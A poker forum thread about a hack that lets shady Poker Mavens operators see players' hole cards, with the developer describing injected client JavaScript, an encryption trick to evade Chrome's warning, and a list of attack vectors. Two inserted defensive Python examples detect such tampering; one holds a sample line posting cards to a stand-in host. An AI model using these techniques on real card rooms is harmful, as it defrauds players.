
Thread: Poker Mavens software hacked to allow superusing for shady operators

  1. #21
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Quote Originally Posted by DonaldTrumpsHairPiece View Post
    And the guy's name is??????????
    I don't even know his name.

    It's some random guy from Lebanon who contacted me, erroneously believing I would want to buy this for the PFA room.

  2. #22
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    BUMP

    Two updates to this strange story.

    First off, the guy who has been trying to sell me the hack is STILL unaware of this thread, and just e-mailed me the following:

    good morning
    i have good news ... now u can know the flop turn river before they will be dealt so u can know who gonna win from the beginning of the hand
    i can let u test it also
    So it looks like you can do even better than superusing. You can have "clairvoyance" which is complete knowledge of the entire hand before it's dealt, which allows you to completely avoid bad beats. Wonderful, huh?

    The second update will be in the next post...

  3. #23
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Second:

    The creator of the tool IS aware of this thread, and has contacted me. I will post his e-mail, and I will validate his account so he can speak for himself, as well.

    Hello, I am the developer of the hack that some person tried to sell to you, and I can see he was even using my website. I'd like to make a clarification on this forum in the thread related.

    Please note that I was not told that he was reselling the hack whatsoever, perhaps he was trying to resell in an unauthorized manner. Nevertheless, as I have seen on the thread that he has wanted to sell it for over 10k$. I was not paid merely half of it.

    Please allow me to post on the thread, as you can moderate it furthermore in case the post was not informative.

    Also, do note that the person I sold the hack to is not from Lebanon, yet I am, maybe there was some kind of identity theft?

    Thank you.
    I can verify this is really the creator of the hack.

  4. #24
    Platinum ftpjesus's Avatar
    Reputation
    587
    Join Date
    Mar 2012
    Location
    Mesa AZ
    Posts
    4,079
    Quote Originally Posted by Dan Druff View Post
    Second:

    The creator of the tool IS aware of this thread, and has contacted me. I will post his e-mail, and I will validate his account so he can speak for himself, as well.

    Hello, I am the developer of the hack that some person tried to sell to you, and I can see he was even using my website. I'd like to make a clarification on this forum in the thread related.

    Please note that I was not told that he was reselling the hack whatsoever, perhaps he was trying to resell in an unauthorized manner. Nevertheless, as I have seen on the thread that he has wanted to sell it for over 10k$. I was not paid merely half of it.

    Please allow me to post on the thread, as you can moderate it furthermore in case the post was not informative.

    Also, do note that the person I sold the hack to is not from Lebanon, yet I am, maybe there was some kind of identity theft?

    Thank you.
    I can verify this is really the creator of the hack.
    I would suggest you confirm the email address of the supposed creator with Kent Briggs. Reason is I caught who the guy was that was soliciting folks which included you and me. It’s a user named Carbon19 on the Briggsoft support forum. He slipped up and posted the email address he had emailed me from trying to solicit me for her software hack when he was trying to help somebody else with a separate issue on the forum. He posted the same weird @gmail.com email account. I also know Kent said the regular registered email address Kent has on file for Carbon19 isn’t the same email address the user posted to contact him at in an open forum posting so don’t be too sure you aren’t getting played. I would cross check with Kent on the email address this creator gives you.

    So... I don’t see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the “seller” and that I wasn’t outing on the forum yet. So I’m gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he’s two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.
    Last edited by ftpjesus; 02-10-2020 at 10:15 PM.

  5. #25
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Quote Originally Posted by ftpjesus View Post
    Quote Originally Posted by Dan Druff View Post
    Second:

    The creator of the tool IS aware of this thread, and has contacted me. I will post his e-mail, and I will validate his account so he can speak for himself, as well.



    I can verify this is really the creator of the hack.
    I would suggest you confirm the email address of the supposed creator with Kent Briggs. Reason is I caught who the guy was that was soliciting folks which included you and me. It’s a user named Carbon19 on the Briggsoft support forum. He slipped up and posted the email address he had emailed me from trying to solicit me for her software hack when he was trying to help somebody else with a separate issue on the forum. He posted the same weird @gmail.com email account. I also know Kent said the regular registered email address Kent has on file for Carbon19 isn’t the same email address the user posted to contact him at in an open forum posting so don’t be too sure you aren’t getting played. I would cross check with Kent on the email address this creator gives you.

    So... I don’t see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the “seller” and that I wasn’t outing on the forum yet. So I’m gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he’s two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.
    I already verified that Kent on here is real.

  6. #26
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Hello,

    Allow me to introduce myself, although this is an unfortunate event, to provide some authenticity: I am a young developer who has had a history in developing (and reverse engineering) software, games, and auto-traders (for the forex/crypto market). (you can search up some of my other forum posts and sales on Google via my username, as this is not a self-advertising post, rather informative)

    Some small context I would have to state is that the person was dealt a trial version of the patched Poker Mavens cheat, he never obtained the full cheat as he did not finish his payments. I'm assuming he went online searching for people to sell this cheat to fund his own (while making money I see), as the $10k price tag was indeed above the limits for a simple card showing trick.

    Quote Originally Posted by ftpjesus View Post
    So... I don't see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the "seller" and that I wasn't outing on the forum yet. So I'm gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he's two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.
    Although I do understand your concern, do note that I was able to get that price tag from the following post:
    Quote Originally Posted by Dan Druff View Post
    BTW, I feigned interest and the guy wanted $10k for his tool.

    Quote Originally Posted by Dan Druff View Post
    It's some random guy from Lebanon who contacted me, erroneously believing I would want to buy this for the PFA room.
    Please note that I am the one from Lebanon, I am not sure of what his nationality is, or whether he is from the same country or not, I do hope it was not identity theft as stated in my email.

    Quote Originally Posted by KBriggs View Post
    Note that if the hack was a modification/injection of javascript into the client module, that could easily be detected. Since the browser loads the entire client code, (even though it is compressed) a byte for byte comparison against a clean site running the same version would make the hacked portion stand out like a sore thumb. And if that code was passing decrypted hole cards to an external server then you know it's a crooked site. Also using a packet sniffer like Wireshark to see if the client was making external connections to anything other than the File Port or Packet Port of the poker server would also be an indication that something was fishy.

    On the other hand if the hack is simply a passive memory scanner that resides entirely on the server then there's no way to detect that. Other than how Ultimate Bet/Absolute Poker was brought down where they got greedy and let their superuser win too much such that it defied statistical odds (if I recall that correctly).
    These words are indeed real and accurate, and I could not have said better otherwise. I will explain the hack provided and used by fellows among the community and ways to detect the cheating.

    Quote Originally Posted by Dan Druff View Post
    good morning
    i have good news ... now u can know the flop turn river before they will be dealt so u can know who gonna win from the beginning of the hand
    i can let u test it also
    So it looks like you can do even better than superusing. You can have "clairvoyance" which is complete knowledge of the entire hand before it's dealt, which allows you to completely avoid bad beats. Wonderful, huh?

    The second update will be in the next post...
    Although this may or may not be possible (subject for research), the person who had access to my trial version of the cheat was not able to do so (the reason is going to be stated below). Unless he was able to obtain a different cheat from elsewhere, I highly doubt clientside users can access such data beforehand. I did tell him I would try to exploit it for an extra fee, though.

    Now that certain things are cleared, I'd like to explain how to detect the vulnerability from the cheat (in case he had resold it to someone else) as he had violated the code of conduct that is supposed to be respected by both parties.

    Before I do so, I'd like to state that Poker Mavens is indeed secure, it was not as easy as other poker software I've gone through, hence went with a different approach, this one required me to reverse engineer the javascript code on the client-side to make a user send the content to someone else.

    In other words, what the hack does is change the code on each person opening Poker Mavens' browser page, like somewhat a 'spyware' in English, that checks what cards you received, then sends them to my server.

    After listening to PFA's radio, I've seen that Dan stated that Kent did not provide a way to know whether the webserver is infected as a client, although his quotation above does, but not in a visible manner.

    First, press Ctrl+Shift+I on Google Chrome, which will bring up the developer console. Press Sources, and select the javascript file which contains the PokerMinJs javascript code.


    Press Ctrl+F to search, and type in 'ajax', this is served to POST/GET content to the server, note that other cheats may use a different method of intercepting and posting methods, but that was in my case.


    If you can find any $.ajax inside the code, do NOT play on that poker site, as it sends data to the owner on the hand of cards you own.

    Please note that PokerMavens is still on the safer end of other poker software out there, and fortunately, most cheats relating to that software are discoverable by the client. I am not saying it is entirely secure as such a thing does not exist, yet it is on the safer side.

    As Kent had stated, if the owner wants to cheat his clients, he WILL find a way to do so, please do not trust any poker website by its software (even those who are using very expensive software, some were easier to hack than PM itself). I respect this guy's code and ethics on not providing the card showing feature upon a client's request. (By making a good reputation out of his software and himself, and more work to fellow cheat developers like me -- just kidding). Any exposed cheat of mine that goes to ruin the reputation of the software/game will get exposed for fixing as I do not intend to destroy any persons' business on the bricks of building my own.

    I'd also like to state that this is not the only way to expose cheats as lots of clients do not load the JS code in such a way, ALL poker software is vulnerable to packet sniffing and memory dump attacks. Some are more secure than others, but the concept is still the same. In the most extreme cases, you can send a replica of your screen to the attacker, making the superuser see what you can see on the table. (this works on almost all online web-based software)

    In PM's case, the data was very well secured from packet intercepting as well, making my job slightly harder:
    Command: "ECards"
    Table: "Ring Game #01"
    Type: "R"
    Salt: "02B18FA165BF3C2F"
    Hand: "22-1"
    Card1: "2C"
    Card2: "98"
    Card3: "64"
    Card4: "0A"
    Card5: "9A"
    Show: "No"
    It does seem he had taken extra precaution on the sniffers, you can always decrypt it with the provided salt, but you'll not be able to intercept them mid-session as it uses the WebSocket's Seed as another key. (which makes packet sniffers less effective in Poker Mavens)

    How could Kent fix this? Several ways, one of the common ways is to double-check the JS file's hash before posting it on the server; another would check the hash of the whole program to prevent its tampering. But I deem this as useless because a hacker will always find a way to hack in ANY ways possible. I suggest only playing poker in trusted real-life casinos, and not through the screen of your computer unless you completely trust the person hosting.

    Do not hesitate to ask any questions regarding this or any other related topic.
    Stay safe!

     
    Comments
      
      Crowe Diddly: informative post from Lebanon rep
    Last edited by Johnaudi; 02-11-2020 at 02:59 AM.
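Kent's suggestion (compare the served client code byte for byte against a clean copy and watch for connections to anything other than the poker server) and Johnaudi's tip (search the loaded bundle for `$.ajax`) can be combined into one offline check a player or room operator can run. The script below is an added example, not Poker Mavens code and not Johnaudi's or Briggsoft's tooling; the two JavaScript snippets, the host names `poker.example.org` and `collector.example.net`, and the function names are constructed for illustration. It hashes the served bundle, diffs it against the clean reference, and reports every added line that uses a browser network primitive, together with any literal host that is not the poker server. It also goes a step beyond the `ajax` tip by covering `fetch`, `XMLHttpRequest`, `WebSocket` and `sendBeacon`, and it can scan a bundle with no reference copy at all.

```python
import difflib
import hashlib
import re

# Constructed sample: a tiny stand-in for a clean client bundle. It is NOT
# Poker Mavens' real client code, just enough structure for the checks to run.
CLEAN_CLIENT_JS = """var Poker={};
Poker.connect=function(h){Poker.ws=new WebSocket("wss://"+h+":8087/");};
Poker.onCards=function(c){Poker.hand=c;Poker.render(c);};
Poker.render=function(c){document.getElementById("hand").innerText=c.join(" ");};
"""

# Constructed sample: the same bundle with one injected statement that forwards
# the player's hole cards to a third-party host, the pattern the thread describes.
TAMPERED_CLIENT_JS = """var Poker={};
Poker.connect=function(h){Poker.ws=new WebSocket("wss://"+h+":8087/");};
Poker.onCards=function(c){Poker.hand=c;$.ajax({url:"https://collector.example.net/h",type:"POST",data:{c:c}});Poker.render(c);};
Poker.render=function(c){document.getElementById("hand").innerText=c.join(" ");};
"""

# Browser primitives a bundle can use to send data anywhere. Searching only for
# "ajax" (the thread's tip) misses the fetch/XHR/WebSocket/sendBeacon variants.
EGRESS_PATTERNS = {
    "jquery-ajax": r"\$\.(?:ajax|post|get|getJSON)\s*\(",
    "fetch": r"\bfetch\s*\(",
    "xhr": r"\bXMLHttpRequest\b",
    "websocket": r"new\s+WebSocket\s*\(",
    "beacon": r"navigator\.sendBeacon\s*\(",
}
HOST_RE = re.compile(r"(?:https?|wss?)://([A-Za-z0-9.-]+)")


def fingerprint(js: str) -> str:
    """SHA-256 of the served bundle, to compare against a known-good copy."""
    return hashlib.sha256(js.encode("utf-8")).hexdigest()


def find_egress(js: str, allowed_hosts):
    """List every line that can send data out, with any literal hosts it names."""
    findings = []
    for text in js.splitlines():
        hits = [name for name, pat in EGRESS_PATTERNS.items() if re.search(pat, text)]
        if not hits:
            continue
        hosts = set(HOST_RE.findall(text))
        findings.append({
            "text": text.strip()[:120],
            "primitives": hits,
            "hosts": hosts,
            "foreign_hosts": hosts - set(allowed_hosts),
        })
    return findings


def added_lines(clean: str, served: str):
    """Lines present in the served bundle but absent from the clean reference."""
    diff = difflib.unified_diff(clean.splitlines(), served.splitlines(), lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


def audit(served: str, allowed_hosts, clean=None):
    """Compare against a clean copy when one is available; otherwise scan everything."""
    if clean is None:
        return {"identical": None, "added_lines": [],
                "suspicious": find_egress(served, allowed_hosts)}
    identical = fingerprint(clean) == fingerprint(served)
    new = [] if identical else added_lines(clean, served)
    return {"identical": identical, "added_lines": new,
            "suspicious": find_egress("\n".join(new), allowed_hosts)}


if __name__ == "__main__":
    report = audit(TAMPERED_CLIENT_JS, ["poker.example.org"], clean=CLEAN_CLIENT_JS)
    for f in report["suspicious"]:
        print(f["primitives"], f["foreign_hosts"] or "(no foreign host literal)", f["text"])
```

A minified bundle is one very long line, so the per-line report will flag the legitimate WebSocket call together with anything injected on that line; in that case the `foreign_hosts` field is the useful signal. As Johnaudi notes in a later post, the payload may be encrypted to dodge the browser's own warnings, so the check keys on where the data goes, not on what it looks like. A Wireshark capture filtered to everything except the poker server's File Port and Packet Port, as Kent suggests, is the runtime counterpart to this static check.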

  7. #27
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Hi John,

    Thanks for your very detailed and informative post.

    The Lebanon info came from looking at your server, where he had me log in so I could view the cheat tool. I didn't bother looking up this guy's IP, though I could do that also. I assumed at the time they were both him, so I didn't bother looking up the other IP.

    Can you explain what was the point of this modified PokerMavens if you were not intending for people to be cheated? What would be the point of developing such a thing otherwise?

    Also, have you ever worked on developing holecard spy hacks for Kings Club or Neighborhood Club?

  8. #28
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Quote Originally Posted by Dan Druff View Post
    Can you explain what was the point of this modified PokerMavens if you were not intending for people to be cheated? What would be the point of developing such a thing otherwise?

    Also, have you ever worked on developing holecard spy hacks for Kings Club or Neighborhood Club?
    This was a freelancer project of which I had been contacted to create. Please note that I am getting paid to do such software, harm is meant to be dealt from the host himself, whether I took the project or someone else. Rather take it whilst getting paid than letting someone else take it.

    For the latter question; I am in no position to give an answer at the moment, yet I did state not to give blind trust to any poker software. I'm not saying that the software you stated are vulnerable, nor am I stating that they are not

    Let us assume X software is a million dollar software with no security loophole (which is not bound to exist). The software itself is not vulnerable, but capturing data from the users' browser is. Whether it is to an external server or not, you can even transfer plain HTML code in case the JavaScript is completely secured. (Which, again, is in theory and does not exist to this date)

    The cheat created for poker maven's of which I exploited above does use a similar system. It is up to the user to figure it out! Chrome already implemented a security feature for such:
    At first, I was sending the username as text to my web server, Google Chrome itself told the webpage user that the website is sending raw data of your username over the web and is not secured. My workaround was to encrypt the username and decrypt it on the server which made it bypass Chrome's protection. I cannot stress this enough, loopholes do and will always exist.

    I do know it is not Dan's objective to diminish Poker Maven's sales by stating it is vulnerable yet to tell the world that it is as a fact. I would rather if we could translate this from "PM's Vulnerable to its host hack" to "Any Poker software is vulnerable and can be manipulated by its host".

    Not only am I targeting the web server or computer based community, but the poker "arcades" and electronic casinos you can go to. I have worked with assembly based software on those electronic poker machines, and some do contain a winning ratio percentage. (And the ones that do not can be reverse engineered)

    I cannot stress this enough. Please stay safe and trust the host before you proceed by playing anywhere.
    Last edited by Johnaudi; 02-11-2020 at 04:02 AM.

  9. #29
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Quote Originally Posted by Johnaudi View Post
    How could Kent fix this? Several ways, one of the common ways is to double-check the JS file's hash before posting it on the server; another would check the hash of the whole program to prevent its tampering.
    That was actually done a few upgrades ago (6.12), I just didn't announce it. The EXE now validates its own digital signature. That will fail if any modification has been made, including the embedded JS client code, and the program will shut down. But code running on the hacker's own hardware can always be hacked and patched, such that those protections are stripped out. So there are no guarantees.

  10. #30
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Quote Originally Posted by KBriggs View Post
    I just didn't announce it.
    Actually I did: http://www.briggsoft.com/forums/view...php?f=7&t=2830

  11. #31
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Quote Originally Posted by KBriggs View Post
    That was actually done a few upgrades ago (6.12), I just didn't announce it. The EXE now validates its own digital signature. That will fail if any modification has been made, including the embedded JS client code, and the program will shut down. But code running on the hacker's own hardware can always be hacked and patched, such that those protections are stripped out. So there are no guarantees.
    This is interesting, perhaps assembled code, is that working on resources as well? As it has compiled with no issues. (Server running as well)

    I can provide an example of patched exe to you privately if that is in your interest.

  12. #32
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Quote Originally Posted by Johnaudi View Post
    This is interesting, perhaps assembled code, is that working on resources as well? As it has compiled with no issues. (Server running as well)
    Hmm, now that I look at that code it appears I'm only checking that the signature belongs to Briggs Softworks and not if the code has been modified. Could have sworn I tested that. Anyway, I'll fix that in 6.15. Note that this will not protect against a passive memory scan for the card deck, which is what would be required to know the community cards in advance (if that claim is true).
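The distinction Kent draws in the last three posts (a check that only confirms who signed the program versus one that confirms the embedded resources are unmodified) is easy to get wrong, so here is an added illustration of the two checks side by side. It is not Briggs Softworks' code and says nothing about how Poker Mavens' own signature check is implemented; the manifest format, the `VENDOR_KEY`, the vendor name and the resource contents are all constructed, and an HMAC stands in for the asymmetric code-signing certificate a shipped product would use (with HMAC the verifier holds the key, which a real design avoids). The weak check passes on a patched `client.js` as long as the manifest itself is intact; the stronger check re-hashes each resource against the signed value and reports the ones that differ.

```python
import hashlib
import hmac
import json

# Constructed stand-in for the vendor's signing key and name (not real values).
VENDOR_KEY = b"vendor-signing-key-placeholder"
VENDOR_NAME = "Example Vendor"


def _signed_body(signer: str, hashes: dict) -> bytes:
    # Canonical encoding so build and verify sign exactly the same bytes.
    return json.dumps({"signer": signer, "hashes": hashes}, sort_keys=True).encode()


def build_manifest(resources: dict) -> dict:
    """Build time: hash every embedded resource, then sign signer name plus hash list."""
    hashes = {name: hashlib.sha256(data).hexdigest() for name, data in resources.items()}
    sig = hmac.new(VENDOR_KEY, _signed_body(VENDOR_NAME, hashes), hashlib.sha256).hexdigest()
    return {"signer": VENDOR_NAME, "hashes": hashes, "sig": sig}


def signer_only_check(manifest: dict) -> bool:
    """Weak check: verifies the signature and the signer's name, never re-hashes content.

    A patched resource passes as long as the untouched manifest still verifies,
    which is the gap described in the post above."""
    expected = hmac.new(VENDOR_KEY, _signed_body(manifest["signer"], manifest["hashes"]),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(manifest["sig"], expected) and manifest["signer"] == VENDOR_NAME


def integrity_check(manifest: dict, resources: dict) -> list:
    """Stronger check: same signature test, then every resource re-hashed and compared
    with the signed value. Returns the names that fail (empty list means clean)."""
    if not signer_only_check(manifest):
        return ["<manifest signature invalid>"]
    failed = []
    for name, expected in manifest["hashes"].items():
        actual = hashlib.sha256(resources.get(name, b"")).hexdigest()
        if not hmac.compare_digest(actual, expected):
            failed.append(name)
    # A resource the manifest never listed is also a modification.
    failed.extend(sorted(n for n in resources if n not in manifest["hashes"]))
    return failed


if __name__ == "__main__":
    # Constructed resources standing in for the embedded client code and server binary.
    shipped = {"client.js": b"var Poker={};/* clean */", "server.bin": b"\x4d\x5a\x00\x01"}
    manifest = build_manifest(shipped)
    patched = dict(shipped, **{"client.js": b"var Poker={};/* clean */$.ajax({url:'https://collector.example.net'})"})
    print("signer-only:", signer_only_check(manifest))        # True: the manifest is untouched
    print("integrity:  ", integrity_check(manifest, patched))  # ['client.js']
```

Kent's caveat still applies to both functions: they run on the operator's own hardware, so an operator who patches the binary can patch the check out as well. The value of the stronger check is that it raises the bar from editing a resource to editing the verifier, and it gives an honest operator or a player with a copy of the bundle a way to confirm nothing embedded has changed.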

  13. #33
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Dan, I just listened to the section of your podcast where this was being discussed and wanted to address a few things you mentioned. When I said that a code injection into the client could be easily detected, I meant easily detected by any player who knew what to look for, not the site operator. When you load the client interface, the HTML and Javascript is now all in your browser. You can see it by pressing Ctrl-U in most browsers. And you can even save it to a file on your local drive. Also when I said that you can run a free packet sniffer like Wireshark to see if the browser is making external connections, it's the player that can do that themselves so they can detect if they have a modified client that is sending their decrypted hole cards back to a shady operator.

    The other issue is that you thought the server module could be written in some tamperproof way via encryption. Not really. Before I was into poker I was really into cryptography and still sell a couple of crypto apps. A talented hacker that has the server program running on their hardware can reverse engineer the machine code, line by line. The cards have to exist in plaintext form at some point before the encryption can occur. Given enough time, patience, and skill, said hacker could find this point. The best the code author could do is throw in a bunch of obfuscation points to make it more difficult to find but obfuscation is not real security.

    One last comment about established poker sites running proprietary software. If the site operators were corrupt, that proprietary software would be the easiest to corrupt because they wrote it themselves. They have the source code and could put the cheating system in as a feature. And no one would know because no one else is going to be running around trying to sell the hack. The only system that you know for certain is on the up-and-up is one you run yourself.

  14. #34
    Silver
    Reputation
    136
    Join Date
    May 2013
    Posts
    862
    Quote Originally Posted by KBriggs View Post
    Quote Originally Posted by Sidewinder View Post
    It sounds nuts, but making this tool available is way better than pretending like it doesn’t exist and letting someone else profit off your hard programming work.
    I care less about the profiting of the hacker. I'm more concerned about the scumbags who would install it on their own server to cheat their own customers. I'm not about to make that easier to do. It's bad for business and bad for the reputation of poker in general.
    Well if you are going to ignore the situation i am not sure what the purpose of you even responding is. You claim it can't be stopped and you claim you aren't going to make a similar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?

    Is there some other option?

     
    Comments
      
      duped_samaritan: ?

  15. #35
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Quote Originally Posted by Sidewinder View Post
    Well if you are going to ignore the situation
    I'm not ignoring anything, I'm just clarifying the problem. It's definitely a problem.

    You claim it can't be stopped and you claim you aren't going to make a similar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?
    Of course I'm not going to make a tool to promote the corruption of my own software and screw over every honest customer I have just to spite some hacker. That would be the dumbest possible thing I could do.

  16. #36
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Quote Originally Posted by Sidewinder View Post
    Well if you are going to ignore the situation i am not sure what the purpose of you even responding is. You claim it can't be stopped and you claim you aren't going to make a similar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?

    Is there some other option?
    This may be the third time I try to explain this.

    Please note that he did fix the signature check in the next version as a first step. It is impossible for him to prevent all the security loopholes, whether included or not in the following list:
    • Exploiters can inject or change the string of the file in live memory, of which he'll need to continuously set checks for that.
    • In case your connection is not HTTPS, the server data can be disrupted upon request.
    • They can listen to all websockets going out upon connectivity (making all data between both users transparent), of which he'll need to use a different protocol of security.
    • They can search up live the memory to get the values needed, of which he could possibly obfuscate.
    • They can pointer scan to changing variables in case it was obfuscated, the variable has to exist at some point, of which the exploiter can force his own as well in this case.
    • The exploiter can create his own randomizer and have it injected, thus making his own rules go through.
    • SQL injection which can allow the reading of all data that may be hidden in the DB. (whether card data, or others)
    • Force a header file for the client users to send data to the same server (hence, no outgoing websockets to an unknown server).
    • And much, much, much more.

    Most of these exploits exist in all poker platforms. Fixing one, or many for that matter, would result in a workaround for the hack developer, and a merely un-debuggable (or hard to understand and use) code by the developer.

  17. #37
    Platinum ftpjesus's Avatar
    Reputation
    587
    Join Date
    Mar 2012
    Location
    Mesa AZ
    Posts
    4,079
    Quote Originally Posted by Sidewinder View Post
    Quote Originally Posted by KBriggs View Post

    I care less about the profiting of the hacker. I'm more concerned about the scumbags who would install it on their own server to cheat their own customers. I'm not about to make that easier to do. It's bad for business and bad for the reputation of poker in general.
    Well if you are going to ignore the situation i am not sure what the purpose of you even responding is. You claim it can't be stopped and you claim you aren't going to make a similar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?

    Is there some other option?
    Why the hell would Kent make a tool to do exactly what this hack is doing?? That’s like saying let’s sell gasoline and glass bottles to the folks who want to riot and start fires because somebody’s already doing it.

  18. #38
    Platinum ftpjesus's Avatar
    Reputation
    587
    Join Date
    Mar 2012
    Location
    Mesa AZ
    Posts
    4,079
    One thing many have missed is what John Audi said that in reality PM is more secure than other poker software he’s seen. That should be telling to many folks. Basically if you trust the site owner or company then you have nothing to worry about because it’s even easier for exploits to happen on bigger names and we’re not talking just UB/AP either.

  19. #39
    Platinum FRANKRIZZO's Avatar
    Reputation
    482
    Join Date
    Sep 2014
    Posts
    3,393
    I think Willie Stole has found the backdoor.

  20. #40
    Cubic Zirconia
    Reputation
    13
    Join Date
    Jul 2017
    Posts
    14
    All of this technical jargon is 75% over my head but is it possible for this to happen on a site like nitrogen with the provably fair stuff? I'm assuming this also works with games with more than 2 hole cards (Omaha etc)?
